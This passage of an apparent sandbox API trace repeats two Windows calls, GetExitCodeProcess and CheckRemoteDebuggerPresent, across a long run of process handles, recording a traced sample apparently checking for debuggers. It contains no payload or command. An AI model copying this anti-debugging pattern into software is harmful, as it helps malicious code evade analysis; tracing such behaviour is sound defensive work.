GetExitCodeProcess (in: hProcess=0x4a0, lpExitCode=0x22a88e8 | out: lpExitCode=0x22a88e8*=0x103) returned 1 [0192.477] CheckRemoteDebuggerPresent (in: hProcess=0x4a0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.477] GetExitCodeProcess (in: hProcess=0x4a4, lpExitCode=0x22a89a0 | out: lpExitCode=0x22a89a0*=0x103) returned 1 [0192.477] CheckRemoteDebuggerPresent (in: hProcess=0x4a4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.477] GetExitCodeProcess (in: hProcess=0x4a8, lpExitCode=0x22a8a58 | out: lpExitCode=0x22a8a58*=0x103) returned 1 [0192.477] CheckRemoteDebuggerPresent (in: hProcess=0x4a8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.477] GetExitCodeProcess (in: hProcess=0x4ac, lpExitCode=0x22a8b10 | out: lpExitCode=0x22a8b10*=0x103) returned 1 [0192.477] CheckRemoteDebuggerPresent (in: hProcess=0x4ac, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.478] GetExitCodeProcess (in: hProcess=0x4b0, lpExitCode=0x22a8bc8 | out: lpExitCode=0x22a8bc8*=0x103) returned 1 [0192.478] CheckRemoteDebuggerPresent (in: hProcess=0x4b0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.478] GetExitCodeProcess (in: hProcess=0x4b4, lpExitCode=0x22a8c80 | out: lpExitCode=0x22a8c80*=0x103) returned 1 [0192.478] CheckRemoteDebuggerPresent (in: hProcess=0x4b4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.478] GetExitCodeProcess (in: hProcess=0x4b8, lpExitCode=0x22a8d38 | out: lpExitCode=0x22a8d38*=0x103) returned 1 [0192.478] CheckRemoteDebuggerPresent (in: hProcess=0x4b8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.478] GetExitCodeProcess (in: hProcess=0x4bc, lpExitCode=0x22a8df0 | out: lpExitCode=0x22a8df0*=0x103) returned 1 [0192.478] CheckRemoteDebuggerPresent (in: hProcess=0x4bc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.478] GetExitCodeProcess (in: hProcess=0x4c0, lpExitCode=0x22a8ea8 | out: lpExitCode=0x22a8ea8*=0x103) returned 1 [0192.479] CheckRemoteDebuggerPresent (in: hProcess=0x4c0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.479] GetExitCodeProcess (in: hProcess=0x4c4, lpExitCode=0x22a8f60 | out: lpExitCode=0x22a8f60*=0x103) returned 1 [0192.479] CheckRemoteDebuggerPresent (in: hProcess=0x4c4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.479] GetExitCodeProcess (in: hProcess=0x4c8, lpExitCode=0x22a9018 | out: lpExitCode=0x22a9018*=0x103) returned 1 [0192.479] CheckRemoteDebuggerPresent (in: hProcess=0x4c8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.479] GetExitCodeProcess (in: hProcess=0x4cc, lpExitCode=0x22a90d0 | out: lpExitCode=0x22a90d0*=0x103) returned 1 [0192.479] CheckRemoteDebuggerPresent (in: hProcess=0x4cc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.479] GetExitCodeProcess (in: hProcess=0x4d0, lpExitCode=0x22a9188 | out: lpExitCode=0x22a9188*=0x103) returned 1 [0192.479] CheckRemoteDebuggerPresent (in: hProcess=0x4d0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.479] GetExitCodeProcess (in: hProcess=0x4d4, lpExitCode=0x22a9240 | out: lpExitCode=0x22a9240*=0x103) returned 1 [0192.479] CheckRemoteDebuggerPresent (in: hProcess=0x4d4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.480] GetExitCodeProcess (in: hProcess=0x4d8, lpExitCode=0x22a92f8 | out: lpExitCode=0x22a92f8*=0x103) returned 1 [0192.480] CheckRemoteDebuggerPresent (in: hProcess=0x4d8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.480] GetExitCodeProcess (in: hProcess=0x4dc, lpExitCode=0x22a93b0 | out: lpExitCode=0x22a93b0*=0x103) returned 1 [0192.480] CheckRemoteDebuggerPresent (in: hProcess=0x4dc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.480] GetExitCodeProcess (in: hProcess=0x4e0, lpExitCode=0x22a9468 | out: lpExitCode=0x22a9468*=0x103) returned 1 [0192.480] CheckRemoteDebuggerPresent (in: hProcess=0x4e0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.480] GetExitCodeProcess (in: hProcess=0x4e4, lpExitCode=0x22a9520 | out: lpExitCode=0x22a9520*=0x103) returned 1 [0192.480] CheckRemoteDebuggerPresent (in: hProcess=0x4e4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.480] GetExitCodeProcess (in: hProcess=0x4e8, lpExitCode=0x22a95d8 | out: lpExitCode=0x22a95d8*=0x103) returned 1 [0192.480] CheckRemoteDebuggerPresent (in: hProcess=0x4e8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.480] GetExitCodeProcess (in: hProcess=0x4ec, lpExitCode=0x22a9690 | out: lpExitCode=0x22a9690*=0x103) returned 1 [0192.481] CheckRemoteDebuggerPresent (in: hProcess=0x4ec, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.481] GetExitCodeProcess (in: hProcess=0x4f0, lpExitCode=0x22a9748 | out: lpExitCode=0x22a9748*=0x103) returned 1 [0192.481] CheckRemoteDebuggerPresent (in: hProcess=0x4f0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.481] GetExitCodeProcess (in: hProcess=0x4f4, lpExitCode=0x22a9800 | out: lpExitCode=0x22a9800*=0x103) returned 1 [0192.481] CheckRemoteDebuggerPresent (in: hProcess=0x4f4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.481] GetExitCodeProcess (in: hProcess=0x4f8, lpExitCode=0x22a98b8 | out: lpExitCode=0x22a98b8*=0x103) returned 1 [0192.481] CheckRemoteDebuggerPresent (in: hProcess=0x4f8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.481] GetExitCodeProcess (in: hProcess=0x4fc, lpExitCode=0x22a9970 | out: lpExitCode=0x22a9970*=0x103) returned 1 [0192.481] CheckRemoteDebuggerPresent (in: hProcess=0x4fc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.481] GetExitCodeProcess (in: hProcess=0x500, lpExitCode=0x22a9a28 | out: lpExitCode=0x22a9a28*=0x103) returned 1 [0192.481] CheckRemoteDebuggerPresent (in: hProcess=0x500, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.481] GetExitCodeProcess (in: hProcess=0x504, lpExitCode=0x22a9ae0 | out: lpExitCode=0x22a9ae0*=0x103) returned 1 [0192.482] CheckRemoteDebuggerPresent (in: hProcess=0x504, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.482] GetExitCodeProcess (in: hProcess=0x508, lpExitCode=0x22a9b98 | out: lpExitCode=0x22a9b98*=0x103) returned 1 [0192.482] CheckRemoteDebuggerPresent (in: hProcess=0x508, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.482] GetExitCodeProcess (in: hProcess=0x50c, lpExitCode=0x22a9c50 | out: lpExitCode=0x22a9c50*=0x103) returned 1 [0192.482] CheckRemoteDebuggerPresent (in: hProcess=0x50c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.482] GetExitCodeProcess (in: hProcess=0x510, lpExitCode=0x22a9d08 | out: lpExitCode=0x22a9d08*=0x103) returned 1 [0192.482] CheckRemoteDebuggerPresent (in: hProcess=0x510, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.482] GetExitCodeProcess (in: hProcess=0x514, lpExitCode=0x22a9dc0 | out: lpExitCode=0x22a9dc0*=0x103) returned 1 [0192.482] CheckRemoteDebuggerPresent (in: hProcess=0x514, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.482] GetExitCodeProcess (in: hProcess=0x518, lpExitCode=0x22a9e78 | out: lpExitCode=0x22a9e78*=0x103) returned 1 [0192.482] CheckRemoteDebuggerPresent (in: hProcess=0x518, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.483] GetExitCodeProcess (in: hProcess=0x51c, lpExitCode=0x22a9f30 | out: lpExitCode=0x22a9f30*=0x103) returned 1 [0192.483] CheckRemoteDebuggerPresent (in: hProcess=0x51c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.483] GetExitCodeProcess (in: hProcess=0x520, lpExitCode=0x22a9fe8 | out: lpExitCode=0x22a9fe8*=0x103) returned 1 [0192.483] CheckRemoteDebuggerPresent (in: hProcess=0x520, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.483] GetExitCodeProcess (in: hProcess=0x524, lpExitCode=0x22aa0a0 | out: lpExitCode=0x22aa0a0*=0x103) returned 1 [0192.483] CheckRemoteDebuggerPresent (in: hProcess=0x524, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.483] GetExitCodeProcess (in: hProcess=0x528, lpExitCode=0x22aa158 | out: lpExitCode=0x22aa158*=0x103) returned 1 [0192.483] CheckRemoteDebuggerPresent (in: hProcess=0x528, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.483] GetExitCodeProcess (in: hProcess=0x52c, lpExitCode=0x22aa210 | out: lpExitCode=0x22aa210*=0x103) returned 1 [0192.483] CheckRemoteDebuggerPresent (in: hProcess=0x52c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.483] GetExitCodeProcess (in: hProcess=0x530, lpExitCode=0x22aa2c8 | out: lpExitCode=0x22aa2c8*=0x103) returned 1 [0192.483] CheckRemoteDebuggerPresent (in: hProcess=0x530, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.484] GetExitCodeProcess (in: hProcess=0x534, lpExitCode=0x22aa380 | out: lpExitCode=0x22aa380*=0x103) returned 1 [0192.484] CheckRemoteDebuggerPresent (in: hProcess=0x534, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.484] GetExitCodeProcess (in: hProcess=0x538, lpExitCode=0x22aa438 | out: lpExitCode=0x22aa438*=0x103) returned 1 [0192.484] CheckRemoteDebuggerPresent (in: hProcess=0x538, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.484] GetExitCodeProcess (in: hProcess=0x53c, lpExitCode=0x22aa4f0 | out: lpExitCode=0x22aa4f0*=0x103) returned 1 [0192.484] CheckRemoteDebuggerPresent (in: hProcess=0x53c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.484] GetExitCodeProcess (in: hProcess=0x540, lpExitCode=0x22aa5a8 | out: lpExitCode=0x22aa5a8*=0x103) returned 1 [0192.484] CheckRemoteDebuggerPresent (in: hProcess=0x540, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.484] GetExitCodeProcess (in: hProcess=0x544, lpExitCode=0x22aa660 | out: lpExitCode=0x22aa660*=0x103) returned 1 [0192.484] CheckRemoteDebuggerPresent (in: hProcess=0x544, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.484] GetExitCodeProcess (in: hProcess=0x548, lpExitCode=0x22aa718 | out: lpExitCode=0x22aa718*=0x103) returned 1 [0192.485] CheckRemoteDebuggerPresent (in: hProcess=0x548, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.485] GetExitCodeProcess (in: hProcess=0x54c, lpExitCode=0x22aa7d0 | out: lpExitCode=0x22aa7d0*=0x103) returned 1 [0192.485] CheckRemoteDebuggerPresent (in: hProcess=0x54c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.485] GetExitCodeProcess (in: hProcess=0x550, lpExitCode=0x22aa888 | out: lpExitCode=0x22aa888*=0x103) returned 1 [0192.485] CheckRemoteDebuggerPresent (in: hProcess=0x550, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.485] GetExitCodeProcess (in: hProcess=0x554, lpExitCode=0x22aa940 | out: lpExitCode=0x22aa940*=0x103) returned 1 [0192.485] CheckRemoteDebuggerPresent (in: hProcess=0x554, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.485] GetExitCodeProcess (in: hProcess=0x558, lpExitCode=0x22aa9f8 | out: lpExitCode=0x22aa9f8*=0x103) returned 1 [0192.485] CheckRemoteDebuggerPresent (in: hProcess=0x558, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.485] GetExitCodeProcess (in: hProcess=0x55c, lpExitCode=0x22aaab0 | out: lpExitCode=0x22aaab0*=0x103) returned 1 [0192.485] CheckRemoteDebuggerPresent (in: hProcess=0x55c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.485] GetExitCodeProcess (in: hProcess=0x560, lpExitCode=0x22aab68 | out: lpExitCode=0x22aab68*=0x103) returned 1 [0192.486] CheckRemoteDebuggerPresent (in: hProcess=0x560, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.486] GetExitCodeProcess (in: hProcess=0x564, lpExitCode=0x22aac20 | out: lpExitCode=0x22aac20*=0x103) returned 1 [0192.486] CheckRemoteDebuggerPresent (in: hProcess=0x564, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.486] GetExitCodeProcess (in: hProcess=0x568, lpExitCode=0x22aacd8 | out: lpExitCode=0x22aacd8*=0x103) returned 1 [0192.486] CheckRemoteDebuggerPresent (in: hProcess=0x568, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.486] GetExitCodeProcess (in: hProcess=0x56c, lpExitCode=0x22aad90 | out: lpExitCode=0x22aad90*=0x103) returned 1 [0192.486] CheckRemoteDebuggerPresent (in: hProcess=0x56c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.486] GetExitCodeProcess (in: hProcess=0x570, lpExitCode=0x22aae48 | out: lpExitCode=0x22aae48*=0x103) returned 1 [0192.486] CheckRemoteDebuggerPresent (in: hProcess=0x570, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.486] GetExitCodeProcess (in: hProcess=0x574, lpExitCode=0x22aaf00 | out: lpExitCode=0x22aaf00*=0x103) returned 1 [0192.486] CheckRemoteDebuggerPresent (in: hProcess=0x574, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.487] GetExitCodeProcess (in: hProcess=0x578, lpExitCode=0x22aafb8 | out: lpExitCode=0x22aafb8*=0x103) returned 1 [0192.487] CheckRemoteDebuggerPresent (in: hProcess=0x578, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.487] GetExitCodeProcess (in: hProcess=0x57c, lpExitCode=0x22ab070 | out: lpExitCode=0x22ab070*=0x103) returned 1 [0192.487] CheckRemoteDebuggerPresent (in: hProcess=0x57c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.487] GetExitCodeProcess (in: hProcess=0x580, lpExitCode=0x22ab128 | out: lpExitCode=0x22ab128*=0x103) returned 1 [0192.487] CheckRemoteDebuggerPresent (in: hProcess=0x580, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.487] GetExitCodeProcess (in: hProcess=0x584, lpExitCode=0x22ab1e0 | out: lpExitCode=0x22ab1e0*=0x103) returned 1 [0192.487] CheckRemoteDebuggerPresent (in: hProcess=0x584, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.487] GetExitCodeProcess (in: hProcess=0x588, lpExitCode=0x22ab298 | out: lpExitCode=0x22ab298*=0x103) returned 1 [0192.487] CheckRemoteDebuggerPresent (in: hProcess=0x588, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.487] GetExitCodeProcess (in: hProcess=0x58c, lpExitCode=0x22ab350 | out: lpExitCode=0x22ab350*=0x103) returned 1 [0192.487] CheckRemoteDebuggerPresent (in: hProcess=0x58c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.488] GetExitCodeProcess (in: hProcess=0x590, lpExitCode=0x22ab408 | out: lpExitCode=0x22ab408*=0x103) returned 1 [0192.488] CheckRemoteDebuggerPresent (in: hProcess=0x590, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.488] GetExitCodeProcess (in: hProcess=0x594, lpExitCode=0x22ab4c0 | out: lpExitCode=0x22ab4c0*=0x103) returned 1 [0192.488] CheckRemoteDebuggerPresent (in: hProcess=0x594, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.488] GetExitCodeProcess (in: hProcess=0x598, lpExitCode=0x22ab578 | out: lpExitCode=0x22ab578*=0x103) returned 1 [0192.488] CheckRemoteDebuggerPresent (in: hProcess=0x598, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.488] GetExitCodeProcess (in: hProcess=0x59c, lpExitCode=0x22ab630 | out: lpExitCode=0x22ab630*=0x103) returned 1 [0192.488] CheckRemoteDebuggerPresent (in: hProcess=0x59c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.488] GetExitCodeProcess (in: hProcess=0x5a0, lpExitCode=0x22ab6e8 | out: lpExitCode=0x22ab6e8*=0x103) returned 1 [0192.488] CheckRemoteDebuggerPresent (in: hProcess=0x5a0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.488] GetExitCodeProcess (in: hProcess=0x5a4, lpExitCode=0x22ab7a0 | out: lpExitCode=0x22ab7a0*=0x103) returned 1 [0192.489] CheckRemoteDebuggerPresent (in: hProcess=0x5a4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.489] GetExitCodeProcess (in: hProcess=0x5a8, lpExitCode=0x22ab858 | out: lpExitCode=0x22ab858*=0x103) returned 1 [0192.489] CheckRemoteDebuggerPresent (in: hProcess=0x5a8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.489] GetExitCodeProcess (in: hProcess=0x5ac, lpExitCode=0x22ab910 | out: lpExitCode=0x22ab910*=0x103) returned 1 [0192.489] CheckRemoteDebuggerPresent (in: hProcess=0x5ac, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.489] GetExitCodeProcess (in: hProcess=0x5b0, lpExitCode=0x22ab9c8 | out: lpExitCode=0x22ab9c8*=0x103) returned 1 [0192.489] CheckRemoteDebuggerPresent (in: hProcess=0x5b0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.489] GetExitCodeProcess (in: hProcess=0x5b4, lpExitCode=0x22aba80 | out: lpExitCode=0x22aba80*=0x103) returned 1 [0192.490] CheckRemoteDebuggerPresent (in: hProcess=0x5b4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.490] GetExitCodeProcess (in: hProcess=0x5b8, lpExitCode=0x22abb38 | out: lpExitCode=0x22abb38*=0x103) returned 1 [0192.490] CheckRemoteDebuggerPresent (in: hProcess=0x5b8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.490] GetExitCodeProcess (in: hProcess=0x5bc, lpExitCode=0x22abbf0 | out: lpExitCode=0x22abbf0*=0x103) returned 1 [0192.490] CheckRemoteDebuggerPresent (in: hProcess=0x5bc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.490] GetExitCodeProcess (in: hProcess=0x5c0, lpExitCode=0x22abca8 | out: lpExitCode=0x22abca8*=0x103) returned 1 [0192.490] CheckRemoteDebuggerPresent (in: hProcess=0x5c0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.490] GetExitCodeProcess (in: hProcess=0x5c4, lpExitCode=0x22abd60 | out: lpExitCode=0x22abd60*=0x103) returned 1 [0192.490] CheckRemoteDebuggerPresent (in: hProcess=0x5c4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.490] GetExitCodeProcess (in: hProcess=0x5c8, lpExitCode=0x22abe18 | out: lpExitCode=0x22abe18*=0x103) returned 1 [0192.490] CheckRemoteDebuggerPresent (in: hProcess=0x5c8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.490] GetExitCodeProcess (in: hProcess=0x5cc, lpExitCode=0x22abed0 | out: lpExitCode=0x22abed0*=0x103) returned 1 [0192.491] CheckRemoteDebuggerPresent (in: hProcess=0x5cc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.491] GetExitCodeProcess (in: hProcess=0x5d0, lpExitCode=0x22abf88 | out: lpExitCode=0x22abf88*=0x103) returned 1 [0192.491] CheckRemoteDebuggerPresent (in: hProcess=0x5d0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.491] GetExitCodeProcess (in: hProcess=0x5d4, lpExitCode=0x22ac040 | out: lpExitCode=0x22ac040*=0x103) returned 1 [0192.491] CheckRemoteDebuggerPresent (in: hProcess=0x5d4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.491] GetExitCodeProcess (in: hProcess=0x5d8, lpExitCode=0x22ac0f8 | out: lpExitCode=0x22ac0f8*=0x103) returned 1 [0192.491] CheckRemoteDebuggerPresent (in: hProcess=0x5d8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.491] GetExitCodeProcess (in: hProcess=0x5dc, lpExitCode=0x22ac1b0 | out: lpExitCode=0x22ac1b0*=0x103) returned 1 [0192.491] CheckRemoteDebuggerPresent (in: hProcess=0x5dc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.491] GetExitCodeProcess (in: hProcess=0x5e0, lpExitCode=0x22ac268 | out: lpExitCode=0x22ac268*=0x103) returned 1 [0192.491] CheckRemoteDebuggerPresent (in: hProcess=0x5e0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.492] GetExitCodeProcess (in: hProcess=0x5e4, lpExitCode=0x22ac320 | out: lpExitCode=0x22ac320*=0x103) returned 1 [0192.492] CheckRemoteDebuggerPresent (in: hProcess=0x5e4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.492] GetExitCodeProcess (in: hProcess=0x5e8, lpExitCode=0x22ac3d8 | out: lpExitCode=0x22ac3d8*=0x103) returned 1 [0192.492] CheckRemoteDebuggerPresent (in: hProcess=0x5e8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.492] GetExitCodeProcess (in: hProcess=0x5ec, lpExitCode=0x22ac490 | out: lpExitCode=0x22ac490*=0x103) returned 1 [0192.492] CheckRemoteDebuggerPresent (in: hProcess=0x5ec, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.492] GetExitCodeProcess (in: hProcess=0x5f0, lpExitCode=0x22ac548 | out: lpExitCode=0x22ac548*=0x103) returned 1 [0192.492] CheckRemoteDebuggerPresent (in: hProcess=0x5f0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.492] GetExitCodeProcess (in: hProcess=0x5f4, lpExitCode=0x22ac600 | out: lpExitCode=0x22ac600*=0x103) returned 1 [0192.492] CheckRemoteDebuggerPresent (in: hProcess=0x5f4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.492] GetExitCodeProcess (in: hProcess=0x5f8, lpExitCode=0x22ac6b8 | out: lpExitCode=0x22ac6b8*=0x103) returned 1 [0192.492] CheckRemoteDebuggerPresent (in: hProcess=0x5f8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.493] GetExitCodeProcess (in: hProcess=0x5fc, lpExitCode=0x22ac770 | out: lpExitCode=0x22ac770*=0x103) returned 1 [0192.493] CheckRemoteDebuggerPresent (in: hProcess=0x5fc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.493] GetExitCodeProcess (in: hProcess=0x600, lpExitCode=0x22ac828 | out: lpExitCode=0x22ac828*=0x103) returned 1 [0192.493] CheckRemoteDebuggerPresent (in: hProcess=0x600, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.493] GetExitCodeProcess (in: hProcess=0x604, lpExitCode=0x22ac8e0 | out: lpExitCode=0x22ac8e0*=0x103) returned 1 [0192.493] CheckRemoteDebuggerPresent (in: hProcess=0x604, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.493] GetExitCodeProcess (in: hProcess=0x608, lpExitCode=0x22ac998 | out: lpExitCode=0x22ac998*=0x103) returned 1 [0192.493] CheckRemoteDebuggerPresent (in: hProcess=0x608, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.493] GetExitCodeProcess (in: hProcess=0x60c, lpExitCode=0x22aca50 | out: lpExitCode=0x22aca50*=0x103) returned 1 [0192.493] CheckRemoteDebuggerPresent (in: hProcess=0x60c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.493] GetExitCodeProcess (in: hProcess=0x610, lpExitCode=0x22acb08 | out: lpExitCode=0x22acb08*=0x103) returned 1 [0192.494] CheckRemoteDebuggerPresent (in: hProcess=0x610, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.494] GetExitCodeProcess (in: hProcess=0x614, lpExitCode=0x22acbc0 | out: lpExitCode=0x22acbc0*=0x103) returned 1 [0192.494] CheckRemoteDebuggerPresent (in: hProcess=0x614, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.494] GetExitCodeProcess (in: hProcess=0x618, lpExitCode=0x22acc78 | out: lpExitCode=0x22acc78*=0x103) returned 1 [0192.494] CheckRemoteDebuggerPresent (in: hProcess=0x618, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.494] GetExitCodeProcess (in: hProcess=0x61c, lpExitCode=0x22acd30 | out: lpExitCode=0x22acd30*=0x103) returned 1 [0192.494] CheckRemoteDebuggerPresent (in: hProcess=0x61c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.494] GetExitCodeProcess (in: hProcess=0x620, lpExitCode=0x22acde8 | out: lpExitCode=0x22acde8*=0x103) returned 1 [0192.494] CheckRemoteDebuggerPresent (in: hProcess=0x620, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.494] GetExitCodeProcess (in: hProcess=0x624, lpExitCode=0x22acea0 | out: lpExitCode=0x22acea0*=0x103) returned 1 [0192.494] CheckRemoteDebuggerPresent (in: hProcess=0x624, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.494] GetExitCodeProcess (in: hProcess=0x628, lpExitCode=0x22acf58 | out: lpExitCode=0x22acf58*=0x103) returned 1 [0192.495] CheckRemoteDebuggerPresent (in: hProcess=0x628, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.495] GetExitCodeProcess (in: hProcess=0x62c, lpExitCode=0x22ad010 | out: lpExitCode=0x22ad010*=0x103) returned 1 [0192.495] CheckRemoteDebuggerPresent (in: hProcess=0x62c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.495] GetExitCodeProcess (in: hProcess=0x630, lpExitCode=0x22ad0c8 | out: lpExitCode=0x22ad0c8*=0x103) returned 1 [0192.495] CheckRemoteDebuggerPresent (in: hProcess=0x630, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.495] GetExitCodeProcess (in: hProcess=0x634, lpExitCode=0x22ad180 | out: lpExitCode=0x22ad180*=0x103) returned 1 [0192.495] CheckRemoteDebuggerPresent (in: hProcess=0x634, 